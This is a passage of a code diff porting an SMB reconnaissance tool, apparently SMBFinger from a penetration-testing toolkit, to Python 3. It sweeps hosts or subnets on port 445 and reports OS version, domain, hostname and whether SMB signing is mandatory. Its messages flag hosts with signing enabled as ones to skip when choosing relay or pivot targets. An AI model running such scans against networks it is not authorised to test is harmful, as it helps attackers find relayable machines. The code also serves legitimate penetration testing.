+ #If max length domain name, there won't be a \x00\x00\x00 delineator to split on
+ if Hostname == '':
+ DomainJoined = data[81:110].decode('latin-1')
+ Hostname = data[113:].decode('latin-1')
+ return Hostname, DomainJoined
+ except:
+ return "Could not get Hostname.", "Could not get Domain joined"
def DomainGrab(Host):
- s = socket(AF_INET, SOCK_STREAM)
- try:
- s.settimeout(Timeout)
- s.connect(Host)
- except:
- print "Host down or port close, skipping"
- pass
- try:
- h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
- n = SMBNegoDataLanMan()
- n.calculate()
- packet0 = str(h)+str(n)
- buffer0 = longueur(packet0)+packet0
- s.send(buffer0)
- data = s.recv(2048)
- s.close()
- if data[8:10] == "\x72\x00":
- return GetHostnameAndDomainName(data)
- except:
- pass
+ global SMB1
+ try:
+ s = socket(AF_INET, SOCK_STREAM)
+ s.settimeout(0.7)
+ s.connect(Host)
+ h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
+ n = SMBNegoDataLanMan()
+ packet0 = str(h)+str(n)
+ buffer0 = longueur(packet0)+packet0
+ s.send(NetworkSendBufferPython2or3(buffer0))
+ data = s.recv(2048)
+ s.close()
+ if data[8:10] == b'\x72\x00':
+ return GetHostnameAndDomainName(data)
+ except IOError as e:
+ if e.errno == errno.ECONNRESET:
+ SMB1 = "Disabled"
+ p("SMB1 is disabled on this host. Please choose another host.")
+ else:
+ return False
def SmbFinger(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
- s.settimeout(Timeout)
- s.connect(Host)
+ s.settimeout(Timeout)
+ s.connect(Host)
except:
- print "Host down or port close, skipping"
- pass
- try:
- h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
- n = SMBNego(Data = SMBNegoData())
- n.calculate()
- packet0 = str(h)+str(n)
- buffer0 = longueur(packet0)+packet0
- s.send(buffer0)
- data = s.recv(2048)
- signing = IsSigningEnabled(data)
- if data[8:10] == "\x72\x00":
- head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
- t = SMBSessionFingerData()
- t.calculate()
- packet0 = str(head)+str(t)
- buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
- data = s.recv(2048)
- s.close()
- if data[8:10] == "\x73\x16":
- OsVersion, ClientVersion = OsNameClientVersion(data)
- return signing, OsVersion, ClientVersion
+ pass
+ try:
+ h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
+ n = SMBNego(Data = SMBNegoData())
+ n.calculate()
+ packet0 = str(h)+str(n)
+ buffer0 = longueur(packet0)+packet0
+ s.send(NetworkSendBufferPython2or3(buffer0))
+ data = s.recv(2048)
+ signing = IsSigningEnabled(data)
+ if data[8:10] == b'\x72\x00':
+ head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
+ t = SMBSessionFingerData()
+ packet0 = str(head)+str(t)
+ buffer1 = longueur(packet0)+packet0
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ data = s.recv(2048)
+ if data[8:10] == b'\x73\x16':
+ OsVersion, ClientVersion = OsNameClientVersion(NetworkRecvBufferPython2or3(data))
+ return signing, OsVersion, ClientVersion
except:
- pass
+ pass
def SmbFingerSigning(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
- s.settimeout(Timeout)
- s.connect((Host, 445))
+ s.settimeout(Timeout)
+ s.connect((Host, 445))
except:
- return False
- try:
- h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
- n = SMBNego(Data = SMBNegoData())
- n.calculate()
- packet0 = str(h)+str(n)
- buffer0 = longueur(packet0)+packet0
- s.send(buffer0)
- data = s.recv(2048)
- signing = IsSigningEnabled(data)
- return signing
+ return False
+ try:
+ h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
+ n = SMBNego(Data = SMBNegoData())
+ n.calculate()
+ packet0 = str(h)+str(n)
+ buffer0 = longueur(packet0)+packet0
+ s.send(buffer0)
+ data = s.recv(2048)
+ signing = IsSigningEnabled(data)
+ return signing
except:
- pass
+ pass
##################
#run it
def ShowResults(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
- s.settimeout(Timeout)
- s.connect(Host)
+ s.settimeout(Timeout)
+ s.connect(Host)
except:
- return False
+ return False
try:
- Hostname, DomainJoined = DomainGrab(Host)
- Signing, OsVer, LanManClient = SmbFinger(Host)
- enabled = color("SMB signing is mandatory. Choose another target", 1, 1)
- disabled = color("SMB signing: False", 2, 1)
- print color("Retrieving information for %s..."%Host[0], 8, 1)
- print enabled if Signing else disabled
- print color("Os version: '%s'"%(OsVer), 8, 3)
- print color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3)
+ Hostname, DomainJoined = DomainGrab(Host)
+ Signing, OsVer, LanManClient = SmbFinger(Host)
+ enabled = color("SMB signing is mandatory. Choose another target", 1, 1)
+ disabled = color("SMB signing: False", 2, 1)
+ print(color("Retrieving information for %s..."%Host[0], 8, 1))
+ print(enabled if Signing else disabled)
+ print(color("Os version: '%s'"%(OsVer), 8, 3))
+ print(color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3))
except:
- pass
+ pass
def ShowSmallResults(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
- s.settimeout(Timeout)
- s.connect(Host)
+ s.settimeout(Timeout)
+ s.connect(Host)
except:
- return False
+ return False
try:
- Hostname, DomainJoined = DomainGrab(Host)
- Signing, OsVer, LanManClient = SmbFinger(Host)
- Message = color("\n[+] Client info: ['%s', domain: '%s', signing:'%s']"%(OsVer, DomainJoined, Signing),4,0)
- return Message
+ Hostname, DomainJoined = DomainGrab(Host)
+ Signing, OsVer, LanManClient = SmbFinger(Host)
+ Message = color("\n[+] Client info: ['%s', domain: '%s', signing:'%s']"%(OsVer, DomainJoined, Signing),4,0)
+ return Message
except:
- pass
+ return None
def ShowScanSmallResults(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
- s.settimeout(Timeout)
- s.connect(Host)
+ s.settimeout(Timeout)
+ s.connect(Host)
except:
- return False
+ return False
try:
- Hostname, DomainJoined = DomainGrab(Host)
- Signing, OsVer, LanManClient = SmbFinger(Host)
- Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing)
- print Message
+ Hostname, DomainJoined = DomainGrab(Host)
+ Signing, OsVer, LanManClient = SmbFinger(Host)
+ Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing)
+ print(Message)
except:
- pass
+ return None
def ShowSigning(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
- s.settimeout(Timeout)
- s.connect((Host, 445))
+ s.settimeout(Timeout)
+ s.connect((Host, 445))
except:
- print "[Pivot Verification Failed]: Target host is down"
- return True
+ print("[Pivot Verification Failed]: Target host is down")
+ return True
try:
- Signing = SmbFingerSigning(Host)
- if Signing == True:
- print "[Pivot Verification Failed]:Signing is enabled. Choose another host."
- return True
- else:
- return False
+ Signing = SmbFingerSigning(Host)
+ if Signing == True:
+ print("[Pivot Verification Failed]:Signing is enabled. Choose another host.")
+ return True
+ else:
+ return False
except:
- pass
+ pass
def RunFinger(Host):
m = re.search("/", str(Host))
if m :
- net,_,mask = Host.partition('/')
- mask = int(mask)
- net = atod(net)
- for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
- ShowResults((host,445))
+ net,_,mask = Host.partition('/')
+ mask = int(mask)
+ net = atod(net)
+ for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
+ ShowResults((host,445))
else:
- ShowResults((Host,445))
+ ShowResults((Host,445))
def RunPivotScan(Host, CurrentIP):
m = re.search("/", str(Host))
if m :
- net,_,mask = Host.partition('/')
- mask = int(mask)
- net = atod(net)
- threads = []
- for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
- if CurrentIP == host:
- pass
- else:
- p = multiprocessing.Process(target=ShowScanSmallResults, args=((host,445),))
- threads.append(p)
- p.start()
- sleep(1)
+ net,_,mask = Host.partition('/')
+ mask = int(mask)
+ net = atod(net)
+ threads = []
+ for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
+ if CurrentIP == host:
+ pass
+ else:
+ p = multiprocessing.Process(target=ShowScanSmallResults, args=((host,445),))
+ threads.append(p)
+ p.start()
+ sleep(1)
else:
- ShowScanSmallResults((Host,445))
-
-
+ ShowScanSmallResults((Host,445))
diff --git a/tools/SMBFinger/odict.py b/tools/SMBFinger/odict.py
index 1a66992..107cb01 100644
--- a/tools/SMBFinger/odict.py
+++ b/tools/SMBFinger/odict.py
@@ -1,4 +1,9 @@
-from UserDict import DictMixin
+import sys
+try:
+ from UserDict import DictMixin
+except ImportError:
+ from collections import UserDict
+ from collections import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):
@@ -14,7 +19,7 @@ class OrderedDict(dict, DictMixin):
def clear(self):
self.__end = end = []
end += [None, end, end]
- self.__map = {}
+ self.__map = {}
dict.clear(self)
def __setitem__(self, key, value):
@@ -48,9 +53,9 @@ class OrderedDict(dict, DictMixin):
if not self:
raise KeyError('dictionary is empty')
if last:
- key = reversed(self).next()
+ key = next(reversed(self))
else:
- key = iter(self).next()
+ key = next(iter(self))
value = self.pop(key)
return key, value
@@ -67,19 +72,29 @@ class OrderedDict(dict, DictMixin):
def keys(self):
return list(self)
- setdefault = DictMixin.setdefault
- update = DictMixin.update
- pop = DictMixin.pop
- values = DictMixin.values
- items = DictMixin.items
- iterkeys = DictMixin.iterkeys
- itervalues = DictMixin.itervalues
- iteritems = DictMixin.iteritems
+ if sys.version_info >= (3, 0):
+ setdefault = DictMixin.setdefault
+ update = DictMixin.update
+ pop = DictMixin.pop
+ values = DictMixin.values
+ items = DictMixin.items
+ iterkeys = DictMixin.keys
+ itervalues = DictMixin.values
+ iteritems = DictMixin.items
+ else:
+ setdefault = DictMixin.setdefault
+ update = DictMixin.update
+ pop = DictMixin.pop
+ values = DictMixin.values
+ items = DictMixin.items
+ iterkeys = DictMixin.iterkeys
+ itervalues = DictMixin.itervalues
+ iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
- return '%s(%r)' % (self.__class__.__name__, self.items())
+ return '%s(%r)' % (self.__class__.__name__, list(self.items()))
def copy(self):
return self.__class__(self)
@@ -94,7 +109,7 @@ class OrderedDict(dict, DictMixin):
def __eq__(self, other):
if isinstance(other, OrderedDict):
return len(self)==len(other) and \
- min(p==q for p, q in zip(self.items(), other.items()))
+ min(p==q for p, q in zip(list(self.items()), list(other.items())))
return dict.__eq__(self, other)
def __ne__(self, other):